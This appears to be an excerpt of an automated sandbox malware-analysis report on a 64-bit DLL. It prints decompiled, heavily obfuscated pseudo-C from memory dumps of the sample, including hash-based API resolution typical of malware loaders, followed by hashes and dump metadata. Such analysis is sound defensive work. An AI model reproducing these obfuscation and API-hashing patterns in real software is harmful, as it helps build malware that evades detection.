                                				signed int _t495;
                                				char _t508;
                                				intOrPtr _t509;
                                				signed int _t510;
                                				intOrPtr _t531;
                                				short _t543;
                                				intOrPtr _t548;
                                				intOrPtr _t549;
                                				intOrPtr _t553;
                                				intOrPtr _t557;
                                				signed int _t563;
                                				signed int _t582;
                                				signed int _t583;
                                				signed long long _t591;
                                				void* _t603;
                                				intOrPtr _t612;
                                				intOrPtr _t641;
                                				signed int _t669;
                                				signed int _t683;
                                				signed int _t695;
                                				signed int _t717;
                                				signed int _t719;
                                				void* _t731;
                                				void* _t733;
                                				void* _t734;
                                				intOrPtr _t737;
                                				long long _t738;
                                				intOrPtr _t741;
                                				long long _t742;
                                				intOrPtr _t743;
                                				long long _t744;
                                				signed long long _t745;
                                				long long _t746;
                                				signed long long _t748;
                                				intOrPtr _t752;
                                				signed long long _t755;
                                				intOrPtr _t756;
                                				intOrPtr _t763;
                                				signed long long _t765;
                                				intOrPtr _t767;
                                				intOrPtr _t772;
                                				signed long long _t774;
                                				intOrPtr _t776;
                                				signed long long _t777;
                                				intOrPtr _t778;
                                				signed long long _t780;
                                				signed long long _t781;
                                				intOrPtr _t782;
                                				signed long long _t783;
                                				signed long long _t784;
                                				signed long long _t791;
                                				signed long long _t792;
                                				signed long long _t793;
                                				signed long long _t794;
                                				signed long long _t795;
                                				intOrPtr _t798;
                                				intOrPtr _t803;
                                				signed long long _t806;
                                				signed long long _t807;
                                				signed int* _t811;
                                				signed int* _t812;
                                				signed int* _t813;
                                				signed int* _t814;
                                				signed int* _t816;
                                				signed long long _t819;
                                				intOrPtr _t822;
                                				signed long long _t842;
                                				signed long long _t845;
                                				intOrPtr _t853;
                                				signed int _t862;
                                				signed long long _t874;
                                				signed long long _t879;
                                				intOrPtr _t880;
                                				signed long long _t881;
                                				intOrPtr _t891;
                                				intOrPtr* _t892;
                                				signed long long _t893;
                                				signed long long _t897;
                                				signed int _t901;
                                				intOrPtr _t902;
                                				signed long long _t904;
                                				signed long long _t910;
                                				intOrPtr _t914;
                                				intOrPtr _t919;
                                				signed long long _t922;
                                				signed long long _t935;
                                				signed long long _t936;
                                				intOrPtr _t941;
                                				void* _t946;
                                				void* _t947;
                                				signed long long _t953;
                                				intOrPtr _t955;
                                				signed long long _t972;
                                				intOrPtr _t973;
                                				signed int _t974;
                                				signed int* _t979;
                                				intOrPtr _t984;
                                				signed long long _t994;
                                				signed long long _t996;
                                				signed long long _t1004;
                                				signed long long _t1007;
                                				long long _t1010;
                                				intOrPtr _t1011;
                                				intOrPtr _t1012;
                                				signed long long _t1017;
                                				long long _t1023;
                                
                                				_t603 = __ebx;
                                				 *((long long*)(_t946 + 0x20)) = __r9;
                                				 *((long long*)(_t946 + 0x10)) = __rdx;
                                				 *((long long*)(_t946 + 8)) = __rcx;
                                				_push(_t1010);
                                				_t947 = _t946 - 0xe8;
                                				_t737 =  *0x13124140; // 0x0
                                				_t888 = __rcx;
                                				r11d =  *0x13124123 & 0x000000ff;
                                				_t811 = __r8;
                                				r8d =  *0x1312416c & 0x0000ffff;
                                				_t1023 = __r9;
                                				 *((long long*)(_t947 + 0x80)) = __r11;
                                				 *(_t947 + 0x64) =  *(_t737 + 0x194c) & 0x0000ffff;
                                				r8w = r8w + 0xffff;
                                				 *(_t947 + 0x90) = __r11;
                                				_t738 =  *0x13124180; // 0x0
                                				r11d = 0x1581;
                                				 *((long long*)(_t947 + 0xc8)) = _t738;
                                				 *0x13124180 = _t738 + 1;
                                				 *0x1312416c = r8w;
                                				_t819 =  *__r8;
                                				r10d = r8w & 0xffffffff;
                                				r8w = r8w + 1;
                                				r9d = r8w & 0xffffffff;
                                				 *((long long*)(_t947 + 0xa0)) = __r9;
                                				 *((long long*)(_t947 + 0x88)) =  *((intOrPtr*)(__rcx + _t819 * 4));
                                				_t741 =  *0x13124188; // 0x0
                                				_t742 =  *((intOrPtr*)(_t947 + 0x168));
                                				 *((long long*)(_t947 + 0xa8)) = _t742;
                                				_t743 =  *0x13124158; // 0x0
                                				_t744 = _t743 + 1;
                                				 *0x1312416c = r8w;
                                				 *0x13124158 = _t744;
                                				 *((long long*)(_t947 + 0xb8)) = _t744;
                                				 *(_t947 + 0x60) =  *0x1312414c & 0x000000ff;
                                				_t745 =  *0x13124124;
                                				 *(_t947 + 0xb0) =  *(_t741 + 0x10 + _t819 * 4) ^  *(_t742 + 0x3360);
                                				_t822 =  *0x13124160; // 0x0
                                				_t1004 = _t745 ^ 0x00001a15;
                                				 *(_t947 + 0x70) = _t1004;
                                				 *(_t947 + 0xd0) = _t745;
                                				 *(_t947 + 0xc0) = _t745;
                                				_t746 =  *0x13124170; // 0x0
                                				 *((long long*)(_t947 + 0x98)) = _t746;
                                				r13d =  *( *__r8 + _t822) & 0x000000ff;
                                				_t31 = _t888 + 3; // 0x3
                                				_t748 =  *0x131241a0; // 0x0
                                				 *((long long*)(_t947 + 0x78)) = _t1010;
                                				 *((char*)(_t748 + 0x598)) = ( *(_t31 + 0x868) & 0x000000ff) + 0x32;
                                				_t480 =  *0x13124134; // 0x0
                                				r10d = r10d | ( *( *((intOrPtr*)(_t947 + 0x180)) +  *__r8 * 2) & 0x0000ffff) + _t480;
                                				 *0x13124134 = _t480 + 1;
                                				 *(_t947 + 0x68) = r10d;
                                				 *0x13124150 = __rcx + 0x97b;
                                				_t972 =  *0x13124158; // 0x0
                                				r10d =  *0x13124133 & 0x000000ff;
                                				r8d = r8d + 1;
                                				_t752 =  *0x13124160; // 0x0
                                				 *0x13124148 = r8d;
                                				 *__r8 =  *__r8 - 1;
                                				 *(_t947 + 0x50) =  *__r8;
                                				 *((intOrPtr*)(_t947 + 0x48)) = r10b;
                                				 *(_t947 + 0x40) =  *0x13124148 + 0x1580;
                                				 *(_t947 + 0x38) =  *( *(_t947 + 0x160) + 0x38fe) & 0x0000ffff;
                                				 *(_t947 + 0x30) = ( *(( *__r11 << 2) + _t752) & 0x000000ff) / ( *( *(_t947 + 0x170) + _t972 * 2) & 0x0000ffff);
                                				 *(_t947 + 0x28) = 0x14f9;
                                				 *(_t947 + 0x20) = 0x13b6;
                                				_t492 = E00007FFC7FFC130E42A0(0xa3f, __r8,  *0x13124148, _t972);
                                				_t953 =  *((intOrPtr*)(_t947 + 0x80));
                                				_t973 =  *((intOrPtr*)(_t947 + 0x150));
                                				 *0x13124132 = _t492;
                                				 *(0x423 + _t1004 * 8) =  *(0x423 + _t1004 * 8) | 0x00000806;
                                				_t755 =  *_t811;
                                				_t891 =  *0x131241a8; // 0x0
                                				_t892 = _t891 +  *_t953;
                                				 *_t892 = ( *( *((intOrPtr*)(_t947 + 0x178)) + 0x10 + _t755 * 4) & 0xea) -  *_t892;
                                				_t756 =  *0x13124140; // 0x0
                                				 *(_t756 + (8 + _t755 * 4) * 4) =  *(_t756 + (8 + _t755 * 4) * 4) | 0x00000d72;
                                				_t495 =  *0x13124148; // 0x0
                                				_t812 =  &(_t811[2]);
                                				 *(_t947 + 0x140) = _t812;
                                				_t612 =  *0x13124194; // 0x0
                                				 *((intOrPtr*)(_t973 +  *_t811 * 8)) = _t612 + 0xbde +  *((intOrPtr*)(_t953 + (_t495 + 7) * 8));
                                				 *_t812 =  *_t812 - 1;
                                				r8d =  *0x13124148; // 0x0
                                				_t914 =  *0x13124150; // 0x0
                                				 *((long long*)(_t947 + 0x48)) = 0x4df;
                                				_t893 =  *0x131241a0; // 0x0
                                				_t994 =  *(_t973 + _t953 * 4 * 4) ^ _t953 * 0x00000004;
                                				 *0x131241a0 = _t893 - 1;
                                				_t103 = _t953 + 4; // 0x4
                                				r9d =  *( *((intOrPtr*)(_t947 + 0x180)) + _t103 * 2) & 0x0000ffff;
                                				r9d = 0xf46;
                                				 *(_t947 + 0x40) = 0x183e / r9d;
                                				 *(_t947 + 0x38) =  *0x13124168;
                                				 *(_t947 + 0x30) = _t994;
                                				 *(_t947 + 0x28) = (_t914 - _t892 >> 1) + _t892 >> 0xb;
                                				 *(_t947 + 0x20) =  *( *(_t947 + 0xb0) +  *(_t947 + 0x170) * 4) ^ 0x000010ea;
                                				_t508 = E00007FFC7FFC130E1520(0x183e / r9d, _t812,  *((intOrPtr*)(__r9 + 0x94 +  *_t812 * 4)),  *(_t947 + 0x170) * 0x18f8, _t973);
                                				r15d = r12d;
                                				_t919 =  *((intOrPtr*)(_t947 + 0x88));
                                				 *((char*)( *((intOrPtr*)( *((intOrPtr*)(_t947 + 0x98)))) + _t919 + 3)) = _t508;
                                				_t509 =  *0x13124168; // 0x0
                                				_t510 = _t509 + 3;
                                				if (r12d -  *((intOrPtr*)(0x1581 + _t510 * 4)) > 0) goto 0x1310026a;
                                				r11d =  *(_t947 + 0x64) & 0x0000ffff;
                                				r9d = _t1004 + _t1004;
                                				r8d = _t1004 * 4;
                                				 *(_t947 + 0x70) = _t994;
                                				 *(_t947 + 0x160) = r9d;
                                				 *(_t947 + 0x140) = r8d;
                                				_t763 =  *0x13124140; // 0x0
                                				_t1017 = r15d;
                                				 *(_t947 + 0x68) =  *(_t947 + 0x68) + ( *(_t763 + 0x14 + (_t1004 + _t1004 * 2) * 4) & 0x000016a9);
                                				_t765 =  *0x131241a0; // 0x0
                                				_t842 =  *((intOrPtr*)( *((intOrPtr*)(_t947 + 0x130)) + _t765 * 8)) +  *0x13124180;
                                				 *((intOrPtr*)( *((intOrPtr*)(_t947 + 0x168)) + r8d * 8)) =  *((intOrPtr*)( *((intOrPtr*)(_t947 + 0x168)) + r8d * 8)) + _t842;
                                				 *(_t812 + _t1017 * 8) =  *(_t812 + _t1017 * 8) | _t1017;
                                				 *((short*)(0x1ae1 + _t1017 * 2)) = _t510 / _t842;
                                				_t955 =  *0x13124150; // 0x0
                                				 *0x13124150 = _t955 - 1;
                                				if ( *((intOrPtr*)( *((intOrPtr*)(_t947 + 0x178)) + _t1004 * 4)) -  *((intOrPtr*)( *((intOrPtr*)(_t947 + 0x178)) + _t1017 * 4)) < 0) goto 0x130fffbc;
                                				_t767 =  *0x13124160; // 0x0
                                				_t897 = r9d;
                                				if ( *((intOrPtr*)(_t897 + _t919)) == 0xa0) goto 0x130fffbc;
                                				_t669 =  *0x13124148; // 0x0
                                				if (_t669 - ( *0x13124120 & 0x0000ffff) < 0) goto 0x130fffbc;
                                				_t974 =  *(_t947 + 0x170);
                                				_t161 = _t897 + 6; // 0x6
                                				if ( *((intOrPtr*)(_t974 + _t161 * 2)) != ( *0x13124133 & 0x000000ff)) goto 0x130fffbc;
                                				r8w = r8w -  *0x1312414c;
                                				_t845 = 3 + _t897 * 4;
                                				r8w = r8w -  *(_t974 + _t845 * 2);
                                				 *(_t974 + _t845 * 2) = r8w;
                                				asm("cdq");
                                				 *(_t1010 + _t1017 * 8) = _t897;
                                				 *0x13124150 = _t767;
                                				 *((char*)(_t919 +  *_t812)) = 0xa0;
                                				 *((long long*)( *_t812 * 8 + _t1010)) =  *((intOrPtr*)(_t947 + 0x138));
                                				r10d =  *0x13124148; // 0x0
                                				_t813 =  &(_t812[2]);
                                				_t772 =  *0x13124128; // 0x0
                                				_t941 =  *0x13124150; // 0x0
                                				r10d = r10d - 1;
                                				_t774 = r10d;
                                				 *0x13124148 = r10d;
                                				r10d =  *( *(_t947 + 0x170) + _t774 * 2) & 0x0000ffff;
                                				r10d = r10d - 0x1002;
                                				 *(_t947 + 0x40) = _t774;
                                				 *(_t947 + 0x38) = r10d;
                                				 *(_t947 + 0x30) = 0;
                                				 *(_t947 + 0x28) = _t994 + _t941;
                                				 *(_t947 + 0x20) = ( *( *(_t947 + 0xc0) +  *_t813 * 2) & 0x0000ffff) - 0xbd5;
                                				_t531 = E00007FFC7FFC130E37F0(_t603, ((0xb70fbb5b * r10d >> 0x20) + r10d >> 0xa) + ((0xb70fbb5b * r10d >> 0x20) + r10d >> 0xa >> 0x1f), _t813, _t1017, _t941,  *(_t772 +  *_t812 * 4) * 0x1310);
                                				_t996 =  *(_t947 + 0x70);
                                				 *0x13124168 = _t531;
                                				goto 0x13100218;
                                				_t222 = _t1023 + 3; // 0x4
                                				r13d = _t222;
                                				_t776 =  *0x13124140; // 0x0
                                				_t777 =  *((intOrPtr*)(_t947 + 0xa0));
                                				 *((intOrPtr*)( *((intOrPtr*)(_t947 + 0x80)) + r13d * 8)) =  *((intOrPtr*)( *((intOrPtr*)(_t947 + 0x80)) + r13d * 8)) + ( *(_t776 +  *_t813 * 4) | _t996);
                                				r9d =  *0x1312416c & 0x0000ffff;
                                				_t853 =  *0x13124160; // 0x0
                                				r9w = r9w + 0xffff;
                                				 *0x1312416c = r9w;
                                				_t901 =  *_t813;
                                				_t814 = _t813 - 8;
                                				r8d =  *(_t901 + _t853) & 0x000000ff;
                                				r8b = r8b + r15b;
                                				 *(_t853 +  *((intOrPtr*)(_t947 + 0x88))) = r8b;
                                				if (( *(_t947 + 0x60) & 0x000000ff) - 0x1977 > 0) goto 0x13100213;
                                				_t731 = _t996 -  *0x13124180; // 0x0
                                				if (_t731 != 0) goto 0x13100213;
                                				 *(_t947 + 0x50) = _t1017;
                                				 *((char*)(_t947 + 0x48)) = 0x55;
                                				 *_t777 =  *_t777 - 1;
                                				 *((long long*)( *((intOrPtr*)(_t947 + 0x98)) + 0x20 + _t777 * 8)) =  *((long long*)( *((intOrPtr*)(_t947 + 0x98)) + 0x20 + _t777 * 8)) + 0x1970;
                                				_t250 = _t1010 + 0xa; // 0xe
                                				 *( *0x13124148 + 0x578) = ( *0x13124132 & 0x000000ff) % ( *( *0x13124148 + 0x578) & 0x000000ff);
                                				_t683 =  *0x13124148; // 0x0
                                				_t984 =  *0x13124158; // 0x0
                                				_t778 =  *0x13124138; // 0x0
                                				 *0x13124148 = _t683 + 1;
                                				_t254 = _t901 + 1; // 0x2
                                				_t902 =  *0x13124128; // 0x0
                                				_t257 = _t1010 - 2; // 0x2
                                				 *0x13124148 = _t254;
                                				_t780 =  *0x13124170; // 0x0
                                				_t781 = _t780 + 1;
                                				 *0x13124170 = _t781;
                                				_t782 =  *0x131241a8; // 0x0
                                				r11d =  *( *_t814 + _t782 + 1) & 0x000000ff;
                                				_t783 =  *0x131241a0; // 0x0
                                				_t784 = _t783 + 1;
                                				 *0x13124158 = _t984 + 1;
                                				 *0x131241a0 = _t784;
                                				 *(_t947 + 0x40) =  *((intOrPtr*)( *((intOrPtr*)(_t947 + 0xa8)) + _t784 * 8)) + _t1017;
                                				r9d = 0xdc;
                                				 *(_t947 + 0x38) = r10d;
                                				 *(_t947 + 0x30) = _t996;
                                				 *(_t947 + 0x28) = 0x55;
                                				 *(_t947 + 0x20) =  *( *((intOrPtr*)(_t947 + 0x78)) + _t781 * 8);
                                				_t543 = E00007FFC7FFC130E42A0( *((intOrPtr*)(_t778 + _t250 * 8)), _t814,  *((intOrPtr*)(_t902 + _t254 * 4)),  *((intOrPtr*)( *((intOrPtr*)(_t947 + 0xa8)) + _t784 * 8)) + _t1017);
                                				_t904 =  *((intOrPtr*)(_t947 + 0x180));
                                				 *(_t947 + 0x40) = _t1017;
                                				 *((short*)(_t904 + 6 +  *_t814 * 2)) = _t543;
                                				 *((intOrPtr*)( *((intOrPtr*)(_t947 + 0x148)) +  *_t814 * 4)) =  *((intOrPtr*)( *((intOrPtr*)(_t947 + 0x80)) + 0x1278)) -  *((intOrPtr*)( *((intOrPtr*)(_t947 + 0x148)) +  *_t814 * 4)) - r15d;
                                				_t862 =  *0x13124160; // 0x0
                                				r8d =  *(_t1017 + _t862) & 0x000000ff;
                                				 *(_t947 + 0x38) = _t862;
                                				 *(_t947 + 0x30) = _t904;
                                				 *(_t947 + 0x28) = 0x171;
                                				 *(_t947 + 0x20) =  *((intOrPtr*)(_t902 + _t257 * 4));
                                				_t548 = E00007FFC7FFC130E37F0(_t603, 0x1994, _t814, _t862, _t904, _t1017);
                                				_t295 = _t1010 + 0x13; // 0x17
                                				_t922 =  *((intOrPtr*)(_t947 + 0x88));
                                				_t935 =  *((intOrPtr*)(_t947 + 0x98));
                                				 *((intOrPtr*)( *((intOrPtr*)(_t947 + 0x130)) + _t295 * 4)) = _t548;
                                				_t1011 =  *((intOrPtr*)(_t947 + 0x78));
                                				r8d =  *(_t947 + 0x140);
                                				r15d = r15d + 1;
                                				r9d =  *(_t947 + 0x160);
                                				r8d = r8d + 4;
                                				_t549 =  *0x13124168; // 0x0
                                				r9d = r9d + 2;
                                				 *(_t947 + 0x140) = r8d;
                                				 *(_t947 + 0x160) = r9d;
                                				if (r15d -  *((intOrPtr*)(0x1581 + (_t549 + 3) * 4)) <= 0) goto 0x130ffd80;
                                				 *(_t947 + 0x70) = _t777;
                                				 *(_t947 + 0x140) = _t814;
                                				_t717 =  *( *((intOrPtr*)(_t947 + 0xa0)) +  *_t814 * 2) & 0x0000ffff;
                                				_t733 = _t935 -  *0x13124150; // 0x0
                                				if (_t733 > 0) goto 0x13100475;
                                				r14d = _t935 * 4;
                                				 *((long long*)((_t935 + 4) * 8 + _t1011)) =  *0x13124148 * 0xcea + _t717 -  *((intOrPtr*)((_t935 + 4) * 8 + _t1011));
                                				_t979 =  *((intOrPtr*)( *((intOrPtr*)(_t947 + 0x130)) + _t922 * 4));
                                				_t791 =  *((intOrPtr*)(_t947 + 0x158));
                                				r8d =  *(_t922 + _t791) & 0x000000ff;
                                				_t553 =  *0x13124168; // 0x0
                                				 *0x13124168 = _t553 - 1;
                                				_t792 =  *0x131241a0; // 0x0
                                				_t793 = _t792 - 1;
                                				 *0x131241a0 = _t793;
                                				_t794 =  *((intOrPtr*)( *((intOrPtr*)(_t947 + 0xa8)) + _t793 * 8));
                                				 *(_t947 + 0x40) =  *((intOrPtr*)( *((intOrPtr*)(_t947 + 0x188)) + _t794 * 4));
                                				 *(_t947 + 0x38) = 0x2f3;
                                				 *(_t947 + 0x30) =  *(_t947 + 0x68) + _t794;
                                				 *(_t947 + 0x28) =  *((intOrPtr*)( *((intOrPtr*)(_t947 + 0x178)) + _t791 * 4)) - _t717;
                                				 *(_t947 + 0x20) = _t922;
                                				_t557 = E00007FFC7FFC130E37F0(_t603, 0x1994,  *((intOrPtr*)(_t947 + 0x178)), _t922,  *((intOrPtr*)( *((intOrPtr*)(_t947 + 0x168)) + _t922 * 8)), _t1017 ^  *0x13124180);
                                				r9d = 0x1581;
                                				 *((intOrPtr*)( *((intOrPtr*)(_t947 + 0xb8)) + (_t941 + 1) * 4)) = _t557;
                                				_t795 = r14d;
                                				 *(_t947 + 0x90) =  *(_t947 + 0x90) ^  *( *((intOrPtr*)(_t947 + 0x148)) + _t795 * 4);
                                				 *((intOrPtr*)(_t795 +  *((intOrPtr*)(_t947 + 0x158)))) = sil;
                                				_t563 = 0x11fa / ( *(_t947 + 0x64) & 0x0000ffff);
                                				 *(_t947 + 0x64) = _t563;
                                				_t641 =  *0x13124168; // 0x0
                                				 *(( *_t979 + 8) * 8 + _t1011) =  *(( *_t979 + 8) * 8 + _t1011) | _t641 + 0x00001a88;
                                				_t910 =  *_t979;
                                				_t874 =  *0x13124178; // 0x0
                                				 *((short*)(_t874 + _t910 * 2)) = _t563 / _t874;
                                				 *_t979 =  *_t979 - 1;
                                				 *( *((intOrPtr*)(_t947 + 0xc8)) +  *_t979 * 2) =  *( *((intOrPtr*)(_t947 + 0xc8)) +  *_t979 * 2) ^ 0x00000eb3;
                                				r8d =  *0x13124123 & 0x000000ff;
                                				r8b = r8b + 1;
                                				_t924 = _t717 + 1;
                                				r14d = r14d + 4;
                                				 *0x13124123 = r8b;
                                				 *0x1312416c =  *0x1312416c & r8d - ((r8d - (0x4f6fddef * r8d >> 0x00000020) >> 0x00000001) + (0x4f6fddef * r8d >> 0x00000020) >> 0x0000000c) * 0x0000186c;
                                				_t734 = _t924 -  *0x13124150; // 0x0
                                				if (_t734 <= 0) goto 0x131002b0;
                                				_t816 =  *(_t947 + 0x140);
                                				_t1007 =  *(_t947 + 0x70);
                                				_t695 =  *0x13124148; // 0x0
                                				_t1012 =  *((intOrPtr*)(_t947 + 0x148));
                                				_t382 = _t910 + 0x25; // 0x25
                                				_t798 =  *0x13124188; // 0x0
                                				r8d =  *(_t798 + _t382 * 4);
                                				r8d = r8d - _t695;
                                				r8d = r8d - (((0x9a50d99d * r8d >> 0x20) + r8d >> 0xc) + ((0x9a50d99d * r8d >> 0x20) + r8d >> 0xc >> 0x1f)) * 0x1a8b;
                                				 *0x1312414c = r8d;
                                				 *_t816 =  *_t816 + 1;
                                				asm("cdq");
                                				 *( *((intOrPtr*)(_t947 + 0x150)) +  *0x1312414c * 4) =  *(_t1012 + 0x20 +  *_t816 * 4) /  *( *((intOrPtr*)(_t947 + 0x150)) +  *0x1312414c * 4);
                                				_t879 =  *0x131241a0; // 0x0
                                				r9d =  *(_t879 +  *((intOrPtr*)(_t947 + 0x88))) & 0x000000ff;
                                				_t880 =  *0x13124178; // 0x0
                                				_t582 =  *0x1312414c; // 0x0
                                				_t583 = _t582 + 1;
                                				r9d = r9d ^  *(_t880 + 0x560) & 0x0000ffff;
                                				 *0x1312414c = _t583;
                                				 *0x13124123 = 0xa0;
                                				_t719 = ( *0x13124123 & 0x000000ff) + 0x00000001 & 0x000000ff;
                                				 *0x1312416c = ( *0x1312416c & 0x0000ffff) + 1;
                                				_t881 = _t583;
                                				_t803 =  *0x13124188; // 0x0
                                				r8d =  *(_t803 + _t881 * 4);
                                				r8d = r8d - (((0xd62b80d7 * r8d >> 0x20) + r8d >> 7) + ((0xd62b80d7 * r8d >> 0x20) + r8d >> 7 >> 0x1f)) * 0x99;
                                				r10d = ( *0x1001 & 0x000000ff) * 0xcdd;
                                				_t591 =  *0x30ca - 0xbd8;
                                				 *(_t947 + 0x50) = _t881 ^ 0x0000172c;
                                				 *((char*)(_t947 + 0x48)) = _t591 - 0x10;
                                				 *(_t947 + 0x40) = _t591;
                                				 *(_t947 + 0x38) = r10d;
                                				 *(_t947 + 0x30) = r8d;
                                				 *(_t947 + 0x28) = _t717 + 1;
                                				 *(_t947 + 0x20) = _t719;
                                				r8d = 0x17c2;
                                				 *((intOrPtr*)( *(_t947 + 0xb0) + _t1007 * 4)) = E00007FFC7FFC130E42A0(r14d, _t816,  *((intOrPtr*)( *((intOrPtr*)(_t947 + 0x188)) + 0x6b30)), _t979);
                                				_t936 =  *((intOrPtr*)(0x407 + _t1007 * 4));
                                				if (_t719 - ( *0x13124120 & 0x0000ffff) < 0) goto 0x13100705;
                                				_t806 =  *0x13124158; // 0x0
                                				_t807 =  *0x131241a0; // 0x0
                                				asm("cdq");
                                				 *(_t947 + 0x40) = _t807 | 0x00000021;
                                				 *(_t947 + 0x38) = ( *( *(_t947 + 0xd0) + 0x10 + _t807 * 2) & 0x0000ffff) /  *(_t1012 + 0x53ec);
                                				 *(_t947 + 0x30) =  *((intOrPtr*)( *((intOrPtr*)(_t947 + 0xb8)) + 0x64 + _t806 * 4)) - 0x16a8;
                                				 *(_t947 + 0x28) =  *(0x1581 + _t936 * 4) & _t719;
                                				 *(_t947 + 0x20) = 0x2bcc;
                                				 *0x13124168 = E00007FFC7FFC130E37F0(_t603, ( *( *(_t947 + 0xd0) + 0x10 + _t807 * 2) & 0x0000ffff) %  *(_t1012 + 0x53ec), _t816, _t719, _t717 + 0x00000001 ^ 0x000002eb, 0xfffff944);
                                				 *((long long*)( *((intOrPtr*)(_t947 + 0x80)) + _t936 * 8 + 8 - 8)) =  *_t816;
                                				if (_t719 + 1 - ( *0x13124120 & 0x0000ffff) >= 0) goto 0x13100641;
                                				return  *0x13124130 & 0x0000ffff;
                                			}

                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.632264364.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000000.00000002.631948100.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.632387402.00007FFC13103000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633723411.00007FFC13118000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633858879.00007FFC13119000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633873174.00007FFC13123000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633880087.00007FFC13126000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffc130e0000_loaddll64.jbxd
                                Similarity
                                • API ID:
                                • String ID: U$U
                                • API String ID: 0-2145350036
                                • Opcode ID: 937f22ca363b0ae4925abfaabb4bdcfae65207e6d9454271833be54c44e087f5
                                • Instruction ID: 960e417c59998a92ec72f836dffbbce2702af9e3497f9adaf9267ca9766af117
                                • Opcode Fuzzy Hash: 937f22ca363b0ae4925abfaabb4bdcfae65207e6d9454271833be54c44e087f5
                                • Instruction Fuzzy Hash: B3829372608E9985E720CF16E8903B977B0F799B99F214136DA8DA3764DF3CE121CB14
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.632264364.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000000.00000002.631948100.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.632387402.00007FFC13103000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633723411.00007FFC13118000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633858879.00007FFC13119000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633873174.00007FFC13123000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633880087.00007FFC13126000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffc130e0000_loaddll64.jbxd
                                Similarity
                                • API ID: ExceptionRaise_clrfp
                                • String ID:
                                • API String ID: 15204871-0
                                • Opcode ID: 4b7e5130b62dd50ab60c4d7127af619fbc2aea48fc4e0f0a345ebf94294e7805
                                • Instruction ID: 38b9f5f747c578af9fbafce340fe61ab291b3e16afba41b8a2a7b6a147c08bcd
                                • Opcode Fuzzy Hash: 4b7e5130b62dd50ab60c4d7127af619fbc2aea48fc4e0f0a345ebf94294e7805
                                • Instruction Fuzzy Hash: C3B17973604B988BEB15CF29CD463687BE4F784B6CF188961DA9D837A4CB39D461CB10
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 37%
                                			E00000201201640C3CD8(intOrPtr __ecx, long long __rbx, void* __rdx, long long __rdi, void* __r9, long long __r12, intOrPtr _a8, long long* _a40, void* _a48, intOrPtr _a56) {
                                				void* _v24;
                                				char _v64;
                                				intOrPtr _v72;
                                				char _v80;
                                				char _v88;
                                				intOrPtr _v104;
                                				long long _v112;
                                				long long _v120;
                                				char _t62;
                                				long long* _t123;
                                				long long* _t124;
                                				void* _t156;
                                				long long* _t157;
                                				void* _t166;
                                				void* _t168;
                                				void* _t172;
                                
                                				_t123 = _t157;
                                				 *((long long*)(_t123 + 0x10)) = __rbx;
                                				 *((long long*)(_t123 + 0x18)) = __rdi;
                                				 *((long long*)(_t123 + 0x20)) = __r12;
                                				 *((intOrPtr*)(_t123 + 8)) = __ecx;
                                				_t154 =  *0x640cd458;
                                				r13d = r8d;
                                				E00000201201640C908C(0x4e1c2e77, _t123,  *((intOrPtr*)( *0x640cd458 + 0x20)));
                                				if (_t123 == 0) goto 0x640c3d36;
                                				r9d = 0x18;
                                				r8d = 0;
                                				_v120 = 0xf0000040;
                                				 *_t123(_t172, _t168, _t166);
                                				goto 0x640c3d38;
                                				if (0 == 0) goto 0x640c3f1a;
                                				r8d = _a56;
                                				_t11 =  &_v80; // 0xfb849f3f
                                				if (E00000201201640C7E40(__rbx, _v72, _t156, _t11) != 0) goto 0x640c3efc;
                                				_t13 = _t123 + 0x10; // 0x10
                                				r8d = _t13;
                                				E00000201201640C487A();
                                				E00000201201640C908C(0xd74cfe41, _t123,  *((intOrPtr*)( *0x640cd458 + 0x20)));
                                				if (_t123 == 0) goto 0x640c3da1;
                                				r9d = 0;
                                				 *_t123();
                                				goto 0x640c3da3;
                                				if (0 != 0) goto 0x640c3dcd;
                                				E00000201201640C908C(0xc06f8334, _t123,  *((intOrPtr*)( *0x640cd458 + 0x18)));
                                				if (_t123 == 0) goto 0x640c3dc0;
                                				 *_t123();
                                				goto 0x640c3dc5;
                                				if (0x7f != 0) goto 0x640c3efc;
                                				r12d = 0;
                                				_t62 =  >  ? 0x10 : r13d;
                                				r8d = _t62;
                                				_v88 = _t62;
                                				0x640c47b0();
                                				r13d = r13d - _v88;
                                				if (_a8 == 0) goto 0x640c3e50;
                                				E00000201201640C908C(0x4217c141, _t123,  *((intOrPtr*)(_t154 + 0x20)));
                                				if (_t123 == 0) goto 0x640c3e8b;
                                				r8d = 0;
                                				_t26 =  &_v88; // 0xfb849f37
                                				_v104 = 0x20;
                                				_v112 = _t26;
                                				_t29 =  &_v64; // 0xfb849f4f
                                				r8b = r13d == 0;
                                				_v120 = _t29;
                                				r9d = 0;
                                				 *_t123();
                                				goto 0x640c3e8d;
                                				E00000201201640C908C(0x8ea73a36, _t123, _v80);
                                				if (_t123 == 0) goto 0x640c3e8b;
                                				r8d = 0;
                                				_t32 =  &_v88; // 0xfb849f37
                                				_v112 = _t32;
                                				r8b = r13d == 0;
                                				_t34 =  &_v64; // 0xfb849f4f
                                				_v120 = _t34;
                                				r9d = 0;
                                				 *_t123();
                                				goto 0x640c3e8d;
                                				if (0 == 0) goto 0x640c3eb9;
                                				r8d = _v88;
                                				0x640c47b0();
                                				r12d = r12d + _v88;
